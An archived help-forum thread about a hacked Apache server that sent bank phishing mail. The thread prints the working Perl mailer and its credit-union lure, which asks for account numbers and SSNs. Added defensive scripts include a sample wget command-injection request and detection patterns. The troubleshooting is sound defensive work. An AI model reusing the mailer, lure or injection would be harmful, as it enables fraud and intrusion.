
Protect Port 80(Apache)

Posted on 2006-07-02
1,598 Views
Last Modified: 2012-05-05
We have an intrusion that looks like an automated script which buries itself in a hidden directory under the /tmp directory. This script is basically a combination of 2 files,
"awstats.pl" and links.txt. What it does is start sending out an email portraying itself as a BANK to all the addresses in the .txt file.
This was the 4th time it attacked us since April 23. We had no choice other than taking the server off the network. Any ideas or suggestions on how to protect port 80 from these kinds of attacks?
Question by:zkaiserm
19 Comments

Author Comment

by:zkaiserm
This is the culprit "awstats.pl"

#!/usr/bin/perl
# Phishing mailer as found on the compromised host. It reads one recipient
# address per line from list.txt and pipes a forged "credit union notice"
# to the local sendmail for each address.

print "Content-type: text/html\n";   # only one newline, so as a CGI reply the header is never terminated

$file = "list.txt";                  # recipient list, one address per line
open(IN_FILE, $file);
my @data=<IN_FILE>;
close IN_FILE;

$contfile = "test.txt";              # read, but never used below
open(IN_FILE, $contfile);
my @contdata = <IN_FILE>;
close IN_FILE;

my $count = 0;

my $SendmailPath = '/usr/sbin/sendmail';
my $from_s = 'customerservice@visionsfcu.org';   # forged header sender; the envelope sender stays the invoking uid
my $subj_s = 'NOTICE FROM Visions Federal Credit Union #REF-ID:79053430';
my $contdata_s = @contdata;          # line count of test.txt, unused

my($mailbody) = <<__END__MAILBODY__;


<html>
<body>

<div id="message" style="width: 1136; height: 558">
  <table id="AutoNumber1" border="1" bordercolor="#111111" cellpadding="0" cellspacing="0" width="34%">
    <tbody>
      <tr>
        <td width="100%">
          <p><img border="0" src="https://www.visionsfcu.org/images/visions2.jpg" width="158" height="50"></p>
          <p align="left"><font face="Arial" size="2">Dear Vision FCU Client,<br>
          &nbsp;&nbsp;&nbsp;<br>
          &nbsp;This is your official notification from Vision FCU&nbsp;that the
          service(s) listed below &nbsp;will be deactivated and deleted if not
          renewed immediately. Previous notifications have &nbsp;been sent to
          the Billing Contact assigned to this account. As the Primary Contact,
          you &nbsp;must renew the service(s) listed below or it will be
          deactivated and deleted.&nbsp;<br>
          <br>
          &nbsp;</font><font face="Verdana" size="2"><a target="_blank" href="http://visionsfcu.acswi.com/fcu-online/session_id.php"><font
color="#003399" face="Arial" size="2"><b>Renew
          Now</b></font></a></font><font face="Arial" size="2">&nbsp; your&nbsp;Vision
          FCU Bill Pay Services.<br>
          <br>
          If you are not enrolled to Online Banking, please enter your checking
          account number as&nbsp;Account Number&nbsp; and Social Security Number&nbsp;
          as Password.</font></p>
          <div style="width: 508; height: 48">
            <font face="Arial" size="2">&nbsp;<br>
            &nbsp;<b><font color="#000000">SERVICE</font></b> : Vision FCU Bill
            Pay Services.<br>
            &nbsp;<b><font color="#000000">EXPIRATION</font><font color="#000080">
            </font></b>:&nbsp;May 15, 2006</font>
          </div>
          <div>
            <font face="Arial" size="2">&nbsp;</font>
          </div>
          <div>
            <font face="Arial" size="2"><br>
            Thank you,&nbsp;sincerely,<br>
            <br>
            <font size="-1">Eric Kingsbury</font>, Customer Service</font>
          </div>
          <div>
            <p align="center"><font face="Verdana" size="2">======================================================================<br>
            &nbsp; IMPORTANT CUSTOMER SUPPORT INFORMATION<br>
            ======================================================================</font></p>
          </div>
          <div>
            <font face="Verdana" size="2">&nbsp;</font>
          </div>
          <div>
            <font face="Verdana" size="2">&nbsp;Document Reference: (#79053430).</font>
          </div>
          <p align="center"><font face="Verdana" size="2"><b>2006 Vision FCU,
          All Rights Reserved. Member FDIC. Equal Housing Lender.</b></font></td>
      </tr>
    </tbody>
  </table>
</div>

</body>

</html>

__END__MAILBODY__

foreach $line (@data){
print qq($line);
sendmail($line, $from_s, $subj_s, $mailbody );
}

sub sendmail{
     my ($to, $from, $subj, $msg) = @_;
     # -t takes the recipients from the headers below; -i stops a lone "." from ending the input.
     # Mail is handed to the local MTA, which makes the outbound SMTP connection itself.
     open (MAIL, "|$SendmailPath -t -i")|| die "Error! Can't use sendmail\n";
     print MAIL "To: $to";            # no "\n" here: relies on the newline kept from list.txt
     print MAIL "From: $from\n";
     print MAIL "Subject: $subj\n";
     print MAIL "Reply-To: $from\n";
     print MAIL "Content-type: text/html\n\n";
     print MAIL "$msg\n";
     close (MAIL);
}

$count = scalar @data;               # was redeclared with "my" here; reuse the one declared above
print "$count emails sent\n";
LVL 27

Expert Comment

by:Tolomir
This is of course just a quick countermeasure:

If it is always the same script, how about modifying the hosts file and adding

127.0.0.1 visionsfcu.org
127.0.0.1 visionsfcu.acswi.com

then creating a directory "images" in the www documents folder and putting a big "FAKE" in the picture visions2.jpg; that file goes in the "images" folder.

Should at least stop the spammer collecting more PINs...

---

Apart from that, apply all security patches for your system, I guess there lies the problem.


Tolomir
LVL 1

Accepted Solution

by: SashaP (earned 125 total points)
There are a couple of solutions:
- Configure your Apache to pass only specific requests (for example, for index.cgi, index.html, etc.) and block all the rest. You can do it using 'RewriteRule' directives.
For example, you can add the following rules to the configuration file of your HTTP server (Apache), in the main server or virtual-host context, where the matched path starts with "/":
RewriteEngine on
# let the entry points you really serve through untouched
RewriteRule ^/index\.(cgi|html)$ - [L]
# refuse everything else with 403 Forbidden
RewriteRule ^ - [F]

- You can try to capture the request that triggers the script (using tcpdump on tcp port 80). Yes, this is Sisyphean work, but catching intrusions at the firewall is not easy. Once you have found the request that causes the intrusion, reconfigure your firewall to block such requests (based on the source IP or another request-specific attribute).


Hope that I helped you.
LVL 18

Expert Comment

by:decoleur
I agree, a large concern that should be addressed is how this application is getting onto your system. Configuring your logs to identify suspicious traffic could go a long way to figuring out how the application is being installed and run. I would also make sure that all of your apps are running the latest versions of the necessary applications and not running anything that is unnecessary. A tool like logwatch can go through your httpd logs and inform you of sketchy behavior.

For example, this is a Perl script; if you can do without Perl then you will stop this application cold even if it stays on your machine.

hope this helps

-t
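Added example (mine, not code from the thread): a log hunt of the kind decoleur and SashaP describe, run over constructed Combined Log Format lines. It flags requests that mention /tmp/ or that combine a shell metacharacter with a download/interpreter word, then ranks the client addresses so the source can be blocked. The stats.pl URL, the addresses and the word list are assumptions for the demo; tune the list to the applications actually deployed.

```shell
#!/bin/sh
# Added example, not from the thread: hunt an Apache access log (Combined Log
# Format) for requests that typically precede "a Perl script appears in /tmp",
# then rank the client addresses so the source can be blocked at the firewall.
# The log lines below are constructed for the demo; the stats.pl URL is made up.

# URL-encoded or raw shell metacharacters: %3B ';'  %7C '|'  %60 '`'  %26 '&'
META='(%3[Bb]|%7[Cc]|%60|%26|[;|&`])'
# A download/interpreter/chmod word bounded by a separator on each side
CMD='(%20|[+]|;|=|%7[Cc]|%3[Bb]|%60)(wget|curl|fetch|lynx|perl|chmod|cd)(%20|[+]|;|%7[Cc]|%3[Bb]|%60|$)'

hunt_log() {
    # $1 = access log. Prints "client<TAB>request" for each suspicious line.
    # A line is suspicious if it references /tmp/ at all, or if it carries a
    # metacharacter AND a command word (either one alone is too noisy).
    awk -v meta="$META" -v cmd="$CMD" '
        {
            s = index($0, "\"")                 # request is the first quoted field
            if (s == 0) next
            rest = substr($0, s + 1)
            req = substr(rest, 1, index(rest, "\"") - 1)
            if (req ~ /\/tmp\// || (req ~ meta && req ~ cmd))
                print $1 "\t" req
        }' "$1"
}

top_clients() {
    # Rank the addresses behind the suspicious requests, most hits first.
    hunt_log "$1" | cut -f1 | sort | uniq -c | sort -rn
}

hit_count() {
    hunt_log "$1" | awk 'END { print NR }'
}

# --- constructed sample log: two benign lines with "perl" / ";" in them,
# --- two attack lines from one client ---
LOG=$(mktemp /tmp/hunt.XXXXXX)
cat >"$LOG" <<'EOF'
10.0.0.5 - - [20/Jun/2006:03:14:07 -0500] "GET /index.html HTTP/1.1" 200 1532 "-" "Mozilla/4.0"
10.0.0.5 - - [20/Jun/2006:03:14:09 -0500] "GET /shop.php?a=1;b=2 HTTP/1.1" 200 4021 "-" "Mozilla/4.0"
192.0.2.44 - - [20/Jun/2006:03:20:11 -0500] "GET /cgi-bin/stats.pl?dir=%7Cwget%20http://198.51.100.9/a.pl%7C HTTP/1.0" 200 312 "-" "Wget/1.9"
192.0.2.44 - - [20/Jun/2006:03:20:13 -0500] "GET /cgi-bin/stats.pl?dir=%7Cperl%20/tmp/.x/a.pl%7C HTTP/1.0" 200 312 "-" "Wget/1.9"
10.0.0.7 - - [20/Jun/2006:03:25:40 -0500] "GET /docs/perl.html HTTP/1.1" 200 9310 "-" "Mozilla/5.0"
EOF

echo "suspicious requests:"
hunt_log "$LOG"
echo "clients to block:"
top_clients "$LOG"
```

Run it against the real log with `hunt_log /var/log/httpd-access.log`; the two-condition rule is what keeps /docs/perl.html and a harmless `a=1;b=2` out of the output while the encoded `|wget ...|` injection and anything touching /tmp/ are listed.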
LVL 38

Expert Comment

by:Rich Rumble
http://www.google.com/search?hl=en&q=locking+down+apache&btnG=Google+Search
Yes, secure your Apache install; make sure it's got the latest patches and you're running the latest version.
http://security.lss.hr/index.php?page=details&ID=LSS-2005-01-01
-rich
LVL 13

Expert Comment

by:prashsax
Emails are sent using port 25/tcp.

You could block this port on the server itself(using ipchains,iptables), or on network.

With port blocked, the script will not be able to send mails.

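Added example, not from the thread. It assumes the Apache user is www (the poster's later remark about mail arriving as www@ourhostname points that way) and ipfw on FreeBSD, the poster's OS, or iptables on Linux as prashsax names. It first inspects a suspect script for how it hands mail off, because that decides which control works: the posted awstats.pl pipes into /usr/sbin/sendmail, so the local MTA makes the port-25 connection under its own uid, a per-user egress rule never sees that traffic, and a blanket block on 25 also stops the server's legitimate mail. The per-user rule does stop scripts that speak SMTP directly. Both sample scripts are constructed.

```shell
#!/bin/sh
# Added example, not from the thread. Two helpers:
#   mail_path         - inspect a suspect script and report HOW it sends mail;
#   smtp_egress_rules - emit a per-user outbound port-25 block for FreeBSD ipfw
#                       (the poster's OS) or Linux iptables, for scripts that
#                       open port 25 themselves. Web-server user assumed "www".
# Caveat: a script that pipes into /usr/sbin/sendmail (as the posted one does)
# never touches port 25; the MTA does, under its own uid, so a per-user rule
# will not see it and a blanket block on 25 stops legitimate mail too.

mail_path() {
    # $1 = script to inspect. Prints one tag per delivery method found.
    found=0
    if grep -Eq '/usr/(sbin|lib)/sendmail|sendmail[[:space:]]+-t' "$1"; then
        echo local-submission; found=1
    fi
    if grep -Eq 'Net::SMTP|IO::Socket::INET|PeerPort|fsockopen|socket\(' "$1"; then
        echo direct-smtp; found=1
    fi
    [ "$found" -eq 1 ] || echo none
}

smtp_egress_rules() {
    # $1 = ipfw | iptables, $2 = user to restrict. Prints the commands only.
    case "$2" in
        *[!A-Za-z0-9_.-]*|'') echo "bad user name: $2" >&2; return 2 ;;
    esac
    case "$1" in
        ipfw)
            # Rule 1000: deny and log TCP leaving this box for any port 25 when
            # the sending process runs as $2. MTA traffic is untouched.
            echo "ipfw add 1000 deny log tcp from me to any 25 out uid $2"
            ;;
        iptables)
            echo "iptables -A OUTPUT -p tcp --dport 25 -m owner --uid-owner $2 -j LOG --log-prefix \"$2-smtp: \""
            echo "iptables -A OUTPUT -p tcp --dport 25 -m owner --uid-owner $2 -j REJECT --reject-with tcp-reset"
            ;;
        *)  echo "unknown firewall: $1" >&2; return 2 ;;
    esac
}

apply_rules() {
    # Touches the live firewall only as root with the tool present; otherwise
    # it just prints what would run. Not invoked by this demo.
    if [ "$(id -u)" -eq 0 ] && command -v "$1" >/dev/null 2>&1; then
        smtp_egress_rules "$1" "$2" | sh -e
    else
        echo "dry run:"; smtp_egress_rules "$1" "$2"
    fi
}

# --- constructed samples: the posted script's delivery line, and a direct one ---
S1=$(mktemp /tmp/s1.XXXXXX); S2=$(mktemp /tmp/s2.XXXXXX)
cat >"$S1" <<'EOF'
open (MAIL, "|/usr/sbin/sendmail -t -i") || die;
EOF
cat >"$S2" <<'EOF'
use Net::SMTP;
my $smtp = Net::SMTP->new('198.51.100.9');
EOF

echo "posted-style script: $(mail_path "$S1")"
echo "direct-SMTP script:  $(mail_path "$S2")"
echo "rules for the direct case (FreeBSD):"
smtp_egress_rules ipfw www
```

For the local-submission case the control has to live in the MTA (who may submit) or in stopping the web server from writing and running scripts at all; the user-name check in smtp_egress_rules is there because the output is meant to be piped into a shell.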
LVL 18

Expert Comment

by:decoleur
Blocking port 25 will solve the problem with sending out emails but will not remove the cause. If the server can be exploited to send out emails, what else is it being used for that you do not know of?

You are better off finding the cause or rebuilding a new box with all of the latest patches. I have seen machines so pwned that you could take three times more time cleaning them than you would dropping in a blank drive and starting over, and that was with extensive logging running on the machine.

Author Comment

by:zkaiserm
Folks,
     Thanks for your response. One thing that bothers me is how these files ended up on our server. Also, it was so well written that they were hidden, or rather not exactly hidden: it's a directory without a name. For example, the space between tmp and trimite is a directory without a name. What could be the cause of these files ending up on our server? Is it the webserver configuration, or is something wrong with the web application? Is there any practical way of knowing that this is how they hack into the webserver? How in the world could someone put files on your server through port 80? That would be the question of the day.


/tmp/  /trimite/awstats.pl
LVL 27

Expert Comment

by:Tolomir
Well, as I posted above. Your system can be vulnerable because it's missing latest patches.

Check what ports are open, check if that software is patched with up-to-date patches.

Tolomir
LVL 38

Expert Comment

by:Rich Rumble
Take your pick... It could be Apache, it could be Tomcat if you're running it, it could be your code, or it could be due to a lax .conf file or setting.
http://secunia.com/search/?search=apache
XSS (cross-site scripting) has been getting more and more attention lately: http://en.wikipedia.org/wiki/XSS There are unfortunately quite a few vectors for this.
To me, if it's not XSS, it's likely lax security of the config or on the directories; write permissions may be granted to everyone... possibly a username/password embedded in your source code?
-rich

Author Comment

by:zkaiserm
Tolomir,
     We have a firewall. Intruders can only use the ports which are open. Your answer looks quite normal. I signed up for Experts Exchange to know what happens behind the scenes. I would like to know how it happens. How can someone send commands through the browser?



Kaiser
LVL 38

Expert Comment

by:Rich Rumble
Flaws in your source code, scripting, scripting interpreters, Apache exploits, lax security settings: all can lead to what happened to you.
Are you running PHP code, CGI/Perl code, do you have a login site? Each piece of software adds complexity, possible exploit vectors, and more overhead for you to figure out how to secure. Login sites can be poorly made; often the database usernames and passwords can be in the source code, or not obfuscated well. You can glean quite a bit of info from a poorly written site.

If you're running PHP, or phpBB, you can see there are hundreds of exploits that can lead to compromise; there are a variety of worst practices that can lead to this also.
http://secunia.com/search/?search=php
http://secunia.com/search/?search=phpbb

Things like this: http://www.securityfocus.com/bid/15250/info http://www.securityfocus.com/bid/15250/discuss
can upload a script. If you'd like to learn more you can search Bugtraq, or pick up some of the Hacking Exposed series of books.
http://governmentsecurity.org/archive/t4603.html Ahh, the loginmatrix challenge... that was a great tool to learn from; it's gone now... too bad, that one was fun.
-rich
LVL 27

Expert Comment

by:Tolomir
Richrumble pointed it out precisely.

Please tell us more about the software components you use.

E.g. Host OS : win 2k3, IIS Webserver, MSSQL Database 2005.

such like...

Tolomir
(also normal)

Author Comment

by:zkaiserm
Apache 1.3.x
mysql 3.x
php 4.1
freebsd 5.1

The email the users got was like www@ourhostname.com. What's this "www" user?
LVL 38

Assisted Solution

by:Rich Rumble
Rich Rumble earned 125 total points
All very dated packages; search for exploits on any one of those and you'll find something. Try downloading GFI's LANguard network scanner and running it against your server; also try Nessus, if it's still free.
-rich
LVL 18

Assisted Solution

by:decoleur
decoleur earned 125 total points
FreeBSD 5.1 was released early in 2003; there are many exploits active in the wild that can compromise a system that has not been patched since the initial install. If you like the platform, wipe and re-install the latest FreeBSD production release (6.1) and patch that.

I would not spend your time trying to track down what is wrong with your system because there are many places that could have issues from the OS to the applications running on it and unless you are very comfortable with this environment, not very obvious to detect.

We will always be more than willing to assist you in this effort, but sometimes it makes more sense to start fresh.

Regards,

-t
LVL 12

Assisted Solution

by:GinEric
GinEric earned 125 total points
Rootkit, variation of vudo.c, and IRC Spykidz warez ware. rkhunter should be obtained and run. Then inspect all of your temp folders and try to get rid of execute permissions there. Look for anything that ends in .pl and the like.

These phishers, hackers, and irc box ownerz know about legitimate programs and often name their stuff after them.  They collect usernames, harvest emails, attempt identity theft, and things like that.

You have to track this down manually and document it all.

User "nobody" should not have mail privileges.  Usually the scripts you are suggesting feign the user as soon as they detect Apache 1.3

But they can do it to other servers as well.

The older Apache, KDE, MySQL, PHP, and quite a few others are vulnerable and the hackers know it; apparently most of the developers either do not or they are unwilling to admit it.

As for your time trying to track down what is wrong, if you don't it is only going to keep on happening.  It will happen until the people doing it are caught and they can't be caught without someone tracking them down.

You don't want the big bank that they are impersonating subpoenaing all of your computers, do you?  Track them down and build evidence.
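Added example, not from the thread: a sweep of the temp directories for the two things the poster found, a directory named only by whitespace (or a leading dot) and an executable .pl under it, plus a helper that strips execute bits as GinEric suggests. The sample tree is constructed. Caveat before relying on it: dropping the x bit, or mounting /tmp noexec, only blocks direct execution; `perl /tmp/x/awstats.pl` still runs, so the script has to be found and the write path into /tmp closed.

```shell
#!/bin/sh
# Added example, not from the thread: sweep a temp directory for what the
# poster found, i.e. a directory whose name is only whitespace (or a leading
# dot) holding an executable Perl script, then strip the execute bits.
# Caveat: removing the x bit (or mounting /tmp noexec) only stops
# "/tmp/x/awstats.pl"; "perl /tmp/x/awstats.pl" still runs. The real fix is
# keeping the web server from writing scripts there in the first place.
# The directory tree below is constructed for the demo.

odd_names() {
    # $1 = directory. Entries below it whose names contain whitespace or start
    # with a dot; both make a casual "ls /tmp" look empty.
    find "$1" -mindepth 1 \( -name '*[[:space:]]*' -o -name '.*' \) -print
}

exec_files() {
    # $1 = directory. Regular files with any execute bit, tagged "script" when
    # they start with a #! line and "binary" otherwise.
    find "$1" -type f \( -perm -u+x -o -perm -g+x -o -perm -o+x \) -print |
    while IFS= read -r f; do
        if [ "$(head -c 2 "$f" 2>/dev/null)" = '#!' ]; then
            printf 'script\t%s\n' "$f"
        else
            printf 'binary\t%s\n' "$f"
        fi
    done
}

strip_exec() {
    # $1 = directory. Remove every execute bit from regular files under it.
    find "$1" -type f \( -perm -u+x -o -perm -g+x -o -perm -o+x \) -exec chmod a-x {} +
}

tmp_mount_opts() {
    # Show how /tmp is mounted; look for noexec (nosuid is worth having too).
    mount | awk '$3 == "/tmp" { print }'
}

# --- constructed sample tree mirroring "/tmp/ /trimite/awstats.pl" ---
SB=$(mktemp -d /tmp/sweep.XXXXXX)
mkdir -p "$SB/ /trimite" "$SB/.x" "$SB/php-sessions"
printf '#!/usr/bin/perl\nprint "x";\n' >"$SB/ /trimite/awstats.pl"
printf 'not a script\n' >"$SB/php-sessions/sess_abc"
chmod 755 "$SB/ /trimite/awstats.pl"

echo "odd names:";   odd_names "$SB"
echo "executables:"; exec_files "$SB"
```

On the real box run `odd_names /tmp; odd_names /var/tmp; exec_files /tmp` as root and keep copies of anything listed before touching it: the thread's own advice to document and preserve evidence applies, and `strip_exec` changes mtimes and permissions the investigation may want intact.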